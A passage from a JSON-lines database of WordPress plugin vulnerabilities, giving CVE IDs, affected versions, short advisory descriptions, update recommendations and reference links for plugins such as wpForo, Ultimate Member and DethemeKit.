email=&sfph_mail=&reponame=&new=3011567%40themeisle-companion%2Ftrunk&old=2991564%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2287","slug":"themeisle-companion","versionEndExcluding":"2.10.24","description":"The Orbit Fox by ThemeIsle WordPress plugin before 2.10.24 does not limit URLs which may be used for the stock photo import feature, allowing the user to specify arbitrary URLs. This leads to a server-side request forgery as the user may force the server to access any URL of their choosing.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b36a184-2138-4a65-8940-07e7764669bb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b36a184-2138-4a65-8940-07e7764669bb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9416","slug":"modula-best-grid-gallery","versionImpact":"2.10.1","versionEndExcluding":"2.10.2","description":"The Modula Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions <= 5.0.36) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160235\\\/modula-best-grid-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160235\\\/modula-best-grid-gallery\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1954040c-2188-48b7-9f21-9a0c851c9165?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1954040c-2188-48b7-9f21-9a0c851c9165?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1640","slug":"bit-form","versionImpact":"2.10.1","versionEndExcluding":"2.10.2","description":"The Contact Form Builder Plugin: Multi Step Contact Form, Payment Form, Custom Contact Form Plugin by Bit Form plugin for WordPress is vulnerable to unauthorized modification of data due to insufficient user validation on the bitforms_update_form_entry AJAX action in all versions up to, and including, 2.10.1. This makes it possible for unauthenticated attackers to modify form submissions.","recommendation":"Update to version 2.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048523\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/Ajax\\\/FrontendAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048523\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/Ajax\\\/FrontendAjax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3668","slug":"powerpack-elements","versionImpact":"2.10.17","versionEndExcluding":"2.10.18","description":"The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator.","recommendation":"Update to version 2.10.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249ccc77-0daf-41bc-b5c5-991bf17d645d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249ccc77-0daf-41bc-b5c5-991bf17d645d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/powerpackelements.com\\\/change-logs\\\/\",\"name\":\"https:\\\/\\\/powerpackelements.com\\\/change-logs\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1230","slug":"simpleshop-cz","versionImpact":"2.10.0","versionEndExcluding":"2.10.1","description":"The SimpleShop plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.0. This is due to missing or incorrect nonce validation on the maybe_disconnect_simpleshop function. This makes it possible for unauthenticated attackers to disconnect the site from simpleshop via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9870db7f-0c8e-44a4-aa0f-13709d773756?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9870db7f-0c8e-44a4-aa0f-13709d773756?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/redbitcz\\\/simpleshop-wp-plugin\\\/commit\\\/8b04c95bb29036658e6a5b1ef735440646e3199b\",\"name\":\"https:\\\/\\\/github.com\\\/redbitcz\\\/simpleshop-wp-plugin\\\/commit\\\/8b04c95bb29036658e6a5b1ef735440646e3199b\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4939","slug":"wc-multivendor-membership","versionEndExcluding":"2.10.1","description":"The WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0870de2d-bca5-4d57-a07f-877a416ce0d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0870de2d-bca5-4d57-a07f-877a416ce0d5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12276","slug":"ultimate-member","versionImpact":"2.9.2","versionEndExcluding":"2.10.0","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to second-order SQL Injection via filenames in all versions up to, and including, 2.9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with access to upload files and manage filenames through a third-party plugin like a File Manager, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The risk of this vulnerability is very minimal as it requires a user to be able to manipulate filenames in order to successfully exploit.","recommendation":"Update to version 2.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242743\\\/ultimate-member\\\/tags\\\/2.10.0\\\/includes\\\/core\\\/class-uploader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242743\\\/ultimate-member\\\/tags\\\/2.10.0\\\/includes\\\/core\\\/class-uploader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846f9828-2f1f-4d08-abfb-909b8d634d8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846f9828-2f1f-4d08-abfb-909b8d634d8a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12315","slug":"wp-ultimate-exporter","versionImpact":"2.9.3","versionEndExcluding":"2.10","description":"The Export All Posts, Products, Orders, Refunds & Users plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.3 via the exports directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/smack_uci_uploads\/exports\/ directory which can contain information like exported user data.","recommendation":"Update to version 2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L1678\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L1678\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230400%40wp-ultimate-exporter&new=3230400%40wp-ultimate-exporter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230400%40wp-ultimate-exporter&new=3230400%40wp-ultimate-exporter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/075709e0-5f00-4d7b-80f6-96e3b4b4a895?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/075709e0-5f00-4d7b-80f6-96e3b4b4a895?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13644","slug":"dethemekit-for-elementor","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's De Gallery widget in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ac720a-db1e-4aca-b12c-5289fa7b8b9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ac720a-db1e-4aca-b12c-5289fa7b8b9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-22713","slug":"wpdm-gutenberg-blocks","versionEndExcluding":"2.1.9","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in WordPress Download Manager Gutenberg Blocks by WordPress Download Manager plugin <= 2.1.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpdm-gutenberg-blocks\\\/wordpress-gutenberg-blocks-by-wordpress-download-manager-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpdm-gutenberg-blocks\\\/wordpress-gutenberg-blocks-by-wordpress-download-manager-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0661","slug":"dethemekit-for-elementor","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.8 via the duplicate_post() function due to insufficient restrictions on which posts can be duplicated. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, draft, or scheduled posts that they should not have access to by duplicating the post.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/admin\\\/includes\\\/dep\\\/admin-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/admin\\\/includes\\\/dep\\\/admin-helper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2c937c-1ff8-4bcc-913b-83bade37d754?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2c937c-1ff8-4bcc-913b-83bade37d754?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11143","slug":"chatbot-chatgpt","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.8. This is due to missing or incorrect nonce validation on the update_assistant, add_new_assistant, and delete_assistant functions. This makes it possible for unauthenticated attackers to modify assistants via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f16b11b0-11df-4fb7-a6af-123f6c09d791?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f16b11b0-11df-4fb7-a6af-123f6c09d791?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185255\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185255\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12818","slug":"wp-smart-tv","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The WP Smart TV plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tv-video-player' shortcode in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222468%40wp-smart-tv&new=3222468%40wp-smart-tv&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222468%40wp-smart-tv&new=3222468%40wp-smart-tv&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1d7cf90-1a9f-4d88-9dfb-f48481095a0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1d7cf90-1a9f-4d88-9dfb-f48481095a0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2309","slug":"wpforo","versionEndExcluding":"2.1.9","description":"The wpForo Forum WordPress plugin before 2.1.9 does not escape some request parameters while in debug mode, leading to a Reflected Cross-Site Scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6161","slug":"wp-crowdfunding","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The WP Crowdfunding WordPress plugin before 2.1.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca7b6a39-a910-4b4f-b9cc-be444ec44942\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca7b6a39-a910-4b4f-b9cc-be444ec44942\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10890","slug":"wpadverts","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The WPAdverts \u2013 Classifieds Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadverts\\\/tags\\\/2.1.7\\\/includes\\\/shortcodes.php#L545\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadverts\\\/tags\\\/2.1.7\\\/includes\\\/shortcodes.php#L545\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192192\\\/wpadverts\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192192\\\/wpadverts\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/592ee7b9-7016-4df3-9218-6f7aebf80503?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/592ee7b9-7016-4df3-9218-6f7aebf80503?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3228","slug":"kiwi-social-share","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Social Sharing Plugin \u2013 Kiwi plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.7 via the 'kiwi-nw-pinterest' class. This makes it possible for unauthenticated attackers to view limited content from password protected posts.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/896a038f-fe54-4120-842e-093ef236a898?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/896a038f-fe54-4120-842e-093ef236a898?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3109786%40kiwi-social-share&new=3109786%40kiwi-social-share&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3109786%40kiwi-social-share&new=3109786%40kiwi-social-share&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25146","slug":"delucks-seo","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The DELUCKS SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the saveSettings() function that had no capability checks in versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever a victim accesses the page.","refs":"[{\"url\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2019\\\/09\\\/21\\\/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-delucks-seo\\\/\",\"name\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2019\\\/09\\\/21\\\/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-delucks-seo\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2161211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2161211\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaa2f738-4764-467c-9544-889ca8ba73d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaa2f738-4764-467c-9544-889ca8ba73d1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-delucks-seo-cross-site-scripting-2-1-7\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-delucks-seo-cross-site-scripting-2-1-7\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5757","slug":"wp-crowdfunding","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The WP Crowdfunding WordPress plugin before 2.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adc5995-03a9-4860-b00b-7f8d7fe18058\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adc5995-03a9-4860-b00b-7f8d7fe18058\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12266","slug":"elex-woocommerce-dynamic-pricing-and-discounts","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The ELEX WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the elex_dp_export_rules() and elex_dp_import_rules() functions in all versions up to, and including, 2.1.7. This makes it possible for unauthenticated attackers to import and export product rules along with obtaining phpinfo() data","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-exporter.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-exporter.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-importer.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-importer.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerc
e-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063d452b-2a35-40aa-a002-ea55da778222?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063d452b-2a35-40aa-a002-ea55da778222?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2249","slug":"wpforo","versionEndExcluding":"2.1.8","description":"The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.7\\\/classes\\\/Actions.php#L444\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.7\\\/classes\\\/Actions.php#L444\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/800fa098-b29f-4979-b7bd-b1186a4dafcb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/800fa098-b29f-4979-b7bd-b1186a4dafcb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.8\\\/classes\\\/Actions.php#L437\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.8\\\/classes\\\/Actions.php#L437\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4670","slug":"pdfjs-viewer-shortcode","versionEndExcluding":"2.1.8","description":"The PDF.js Viewer WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a67c290-2a27-44fe-95ae-2d427e9d7548\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a67c290-2a27-44fe-95ae-2d427e9d7548\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10684","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dir' parameter in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.8, or a newer patched 